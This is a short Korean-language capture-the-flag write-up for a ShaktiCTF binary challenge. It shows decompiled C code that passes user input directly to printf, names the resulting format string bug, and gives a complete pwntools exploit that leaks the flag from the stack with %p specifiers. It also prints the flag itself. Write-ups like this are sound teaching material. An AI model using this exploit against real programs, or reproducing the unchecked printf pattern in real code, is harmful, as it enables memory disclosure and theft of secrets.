# Description
Can you handle this top secret confidential case, fellow detective?
Author: omelette_keychain
Plain Text
복사
# 분석
코드를 보자
int __fastcall main(int argc, const char **argv, const char **envp)
{
char v4; // [rsp+17h] [rbp-B9h] BYREF
FILE *stream; // [rsp+18h] [rbp-B8h]
char s[64]; // [rsp+20h] [rbp-B0h] BYREF
char format[104]; // [rsp+60h] [rbp-70h] BYREF
unsigned __int64 v8; // [rsp+C8h] [rbp-8h]
v8 = __readfsqword(0x28u);
stream = fopen("flag.txt", "r");
if ( !stream )
printf("Error in opening the flag file");
fgets(s, 63, stream);
puts("Welcome to the Armed Detective Agency - the best and most famous detective agency in all of Yokohama!");
puts("Thank you for coming, future detective! We need your help on this very important and classified mission!");
puts("A chest full of ability crystals has been lost somewhere in this binary.");
puts("Can you help us find it? (Y/n)");
__isoc99_scanf("%c", &v4);
if ( v4 == 'n' )
{
puts("Aww! We really looked forward to working with you! :(\n Have a nice day.");
}
else
{
puts("Great! What was your name again?");
__isoc99_scanf("%s", format);
printf("Looking forward to working with you ");
printf(format);
}
return 0;
}
C
복사
간단한 Format String Bug 취약점이다.
s에 flag의 내용을 넣고 printf를 호출함으로, 호출 시 인자만 잘 맞춰주면 flag를 유출할 수있다.
# Payload
#!/usr/bin/env python3.12
'''
author: JangJongMin
time: 2025-07-25 21:37:37
'''
from pwn import *
filename = "mission_patched"
libcname = "/home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1".strip()
port = 1337
elf = context.binary = ELF(filename)
context.terminal = ['tmux', 'neww']
if libcname:
libc = ELF(libcname)
gs = '''
set debug-file-directory /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
set $pie_base=$_base("mission_patched")
b *($pie_base + 0x131C)
c
'''
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
else:
return process(elf.path)
def log(str_, hex_):
success(f"{str_} : {hex(hex_)}")
def DEPTR(ptr):
_12bits = []
dec = 0
while ptr != 0:
_12bits.append(ptr & 0xfff)
ptr = ptr >> 12
x = _12bits.pop()
while len(_12bits) > 0:
dec |= x
dec <<= 12
y = _12bits.pop()
x = x ^ y
dec |= x
return dec
def ENPTR(pos, ptr):
return (pos >> 12) ^ (ptr)
p = start()
s = p.send
sf = p.sendafter
sl = p.sendline
slf = p.sendlineafter
r = p.recv
ru = p.recvuntil
rl = p.recvline
slf("(Y/n)", "Y")
payload = ""
for i in range(8):
payload += "%{}$p".format(int(4+i)+6)
slf("?", payload+'EOF')
ru(b"you ")
print(b''.join([bytes.fromhex(i.decode())[::-1] for i in ru("EOF")[:-3].split(b"0x") if i]))
p.interactive()
Python
복사
# Flag
ShaktiCTF{th3_eXtr@ct3d_@bilitie5_v@n1sh_but_th3_fl@g_r3m@1ns}
Plain Text
복사